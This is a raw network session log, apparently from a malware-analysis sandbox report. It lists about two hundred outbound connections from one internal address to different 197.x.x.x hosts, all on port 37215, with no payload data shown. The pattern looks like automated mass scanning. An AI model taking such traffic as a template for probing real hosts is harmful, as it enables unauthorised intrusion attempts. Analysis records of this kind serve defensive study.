                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12528192.168.2.1560360197.74.16.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12529192.168.2.1550296197.138.18.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12530192.168.2.1559080197.119.151.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12531192.168.2.1553438197.254.135.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12532192.168.2.1552146197.99.81.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12533192.168.2.1536544197.101.201.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12534192.168.2.1546628197.179.52.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12535192.168.2.1553960197.248.62.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12536192.168.2.1556634197.136.143.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12537192.168.2.1535988197.91.175.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12538192.168.2.1542704197.39.38.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12539192.168.2.1548270197.171.252.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12540192.168.2.1555420197.182.177.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12541192.168.2.1560466197.106.141.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12542192.168.2.1546650197.95.107.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12543192.168.2.1546764197.101.7.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12544192.168.2.1542310197.150.134.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12545192.168.2.1541700197.191.133.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12546192.168.2.1548686197.129.209.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12547192.168.2.1544990197.203.215.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12548192.168.2.1550656197.185.32.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12549192.168.2.1548638197.162.195.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12550192.168.2.1554010197.3.58.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12551192.168.2.1535016197.134.232.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12552192.168.2.1552474197.135.206.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12553192.168.2.1539956197.196.249.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12554192.168.2.1543016197.115.175.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12555192.168.2.1558096197.1.50.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12556192.168.2.1551014197.65.160.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12557192.168.2.1546306197.108.90.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12558192.168.2.1533454197.64.155.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12559192.168.2.1556568197.122.239.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12560192.168.2.1535080197.124.149.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12561192.168.2.1538782197.137.144.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12562192.168.2.1552726197.4.12.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12563192.168.2.1546014197.217.185.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12564192.168.2.1556566197.130.226.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12565192.168.2.1551316197.36.234.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12566192.168.2.1533034197.29.198.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12567192.168.2.1548428197.209.229.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12568192.168.2.1538266197.247.62.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12569192.168.2.1541526197.82.224.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12570192.168.2.1547516197.87.163.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12571192.168.2.1537202197.96.195.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12572192.168.2.1541152197.146.154.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12573192.168.2.1544546197.221.100.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12574192.168.2.1550338197.24.113.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12575192.168.2.1540650197.5.64.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12576192.168.2.1533274197.124.55.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12577192.168.2.1544366197.86.192.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12578192.168.2.1560898197.119.162.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12579192.168.2.1537070197.251.209.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12580192.168.2.1538546197.144.31.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12581192.168.2.1549622197.217.179.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12582192.168.2.1534632197.15.187.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12583192.168.2.1556794197.102.139.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12584192.168.2.1557454197.155.138.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12585192.168.2.1559618197.162.9.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12586192.168.2.1536694197.219.253.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12587192.168.2.1536262197.144.63.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12588192.168.2.1541628197.126.204.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12589192.168.2.1552852197.172.247.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12590192.168.2.1553940197.186.146.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12591192.168.2.1543526197.241.105.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12592192.168.2.1547158197.33.11.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12593192.168.2.1535656197.132.39.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12594192.168.2.1534490197.103.184.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12595192.168.2.1550054197.139.87.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12596192.168.2.1544236197.114.147.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12597192.168.2.1541670197.220.113.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12598192.168.2.1559134197.146.195.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12599192.168.2.1537976197.93.47.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12600192.168.2.1552018197.190.138.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12601192.168.2.1546174197.99.171.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12602192.168.2.1541434197.199.37.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12603192.168.2.1554634197.128.40.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12604192.168.2.1534326197.149.183.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12605192.168.2.1549820197.235.45.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12606192.168.2.1548648197.61.122.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12607192.168.2.1537780197.17.170.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12608192.168.2.1559042197.149.21.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12609192.168.2.1548252197.108.88.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12610192.168.2.1554560197.97.119.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12611192.168.2.1553776197.81.64.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12612192.168.2.1539632197.77.201.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12613192.168.2.1546878197.73.151.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12614192.168.2.1547418197.233.201.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12615192.168.2.1553708197.250.32.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12616192.168.2.1551740197.166.71.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12617192.168.2.1541342197.167.225.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12618192.168.2.1535680197.22.187.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12619192.168.2.1547128197.97.72.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12620192.168.2.1554974197.46.217.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12621192.168.2.1554570197.110.132.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12622192.168.2.1546258197.10.176.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12623192.168.2.1539132197.165.140.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12624192.168.2.1536132197.60.40.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12625192.168.2.1548310197.170.62.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12626192.168.2.1549316197.54.43.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12627192.168.2.1534632197.240.164.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12628192.168.2.1550264197.175.138.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12629192.168.2.1550882197.178.71.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12630192.168.2.1555110197.136.177.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12631192.168.2.1533400197.191.190.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12632192.168.2.1559096197.161.9.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12633192.168.2.1557228197.131.204.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12634192.168.2.1547398197.49.115.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12635192.168.2.1553980197.45.0.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12636192.168.2.1550116197.189.230.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12637192.168.2.1559890197.16.86.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12638192.168.2.1547258197.120.184.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12639192.168.2.1533378197.63.175.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12640192.168.2.1553914197.248.123.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12641192.168.2.1554610197.48.72.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12642192.168.2.1540132197.78.187.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12643192.168.2.1537972197.222.180.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12644192.168.2.1539008197.3.106.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12645192.168.2.1557960197.36.150.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12646192.168.2.1553346197.253.243.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12647192.168.2.1558618197.17.38.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12648192.168.2.1559054197.94.235.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12649192.168.2.1552694197.25.17.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12650192.168.2.1546310197.28.42.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12651192.168.2.1540450197.15.63.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12652192.168.2.1533218197.194.208.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12653192.168.2.1539762197.195.123.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12654192.168.2.1554248197.186.16.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12655192.168.2.1558828197.13.216.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12656192.168.2.1558852197.215.31.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12657192.168.2.1544576197.232.190.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12658192.168.2.1550908197.253.120.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12659192.168.2.1556110197.103.163.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12660192.168.2.1556230197.9.129.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12661192.168.2.1548156197.241.69.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12662192.168.2.1545092197.118.101.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12663192.168.2.1556240197.175.176.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12664192.168.2.1533000197.134.30.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12665192.168.2.1533742197.236.150.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12666192.168.2.1540120197.34.214.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12667192.168.2.1548350197.78.28.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12668192.168.2.1548604197.243.85.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12669192.168.2.1536668197.98.81.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12670192.168.2.1558080197.91.83.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12671192.168.2.1560694197.255.42.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12672192.168.2.1547776197.18.16.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12673192.168.2.1550482197.250.185.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12674192.168.2.1536766197.165.191.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12675192.168.2.1536764197.19.45.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12676192.168.2.1542196197.237.106.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12677192.168.2.1557412197.164.16.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12678192.168.2.1541504197.122.101.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12679192.168.2.1541374197.139.171.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12680192.168.2.1538010197.99.251.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12681192.168.2.1555906197.56.38.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12682192.168.2.1559776197.123.7.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12683192.168.2.1559346197.200.47.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12684192.168.2.1551898197.85.97.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12685192.168.2.1533830197.244.243.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12686192.168.2.1541036197.73.80.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12687192.168.2.1538422197.103.178.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12688192.168.2.1559568197.217.47.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12689192.168.2.1547552197.200.10.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12690192.168.2.1548116197.213.2.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12691192.168.2.1560480197.116.159.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12692192.168.2.1542896197.37.233.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12693192.168.2.1556312197.237.93.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12694192.168.2.1535018197.159.102.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12695192.168.2.1535454197.245.121.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12696192.168.2.1544596197.31.141.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12697192.168.2.1557488197.204.6.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12698192.168.2.1537168197.88.121.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12699192.168.2.1560364197.128.172.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12700192.168.2.1541554197.113.9.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12701192.168.2.1547240197.28.132.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12702192.168.2.1539476197.40.178.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12703192.168.2.1544528197.164.89.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12704192.168.2.1540620197.197.82.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12705192.168.2.1535618197.172.30.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12706192.168.2.1552174197.182.217.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12707192.168.2.1553584197.136.9.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12708192.168.2.1560864197.229.117.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12709192.168.2.1534814197.173.75.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12710192.168.2.1550892197.229.9.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12711192.168.2.1546172197.209.176.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12712192.168.2.1552890197.55.184.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12713192.168.2.1547068197.230.130.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12714192.168.2.1551036197.133.236.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12715192.168.2.1549050197.225.189.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12716192.168.2.1550534197.69.84.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12717192.168.2.1551678197.214.104.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12718192.168.2.1558008197.206.0.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12719192.168.2.1535046197.171.247.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12720192.168.2.1541296197.2.255.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12721192.168.2.1543206197.251.67.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12722192.168.2.1539058197.99.243.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12723192.168.2.1536388197.67.80.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12724192.168.2.1542210197.96.168.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12725192.168.2.1559488197.195.16.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12726192.168.2.1533012197.98.104.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12727192.168.2.1546184197.58.65.14137215
                                                                            TimestampBytes transferredDirectionData


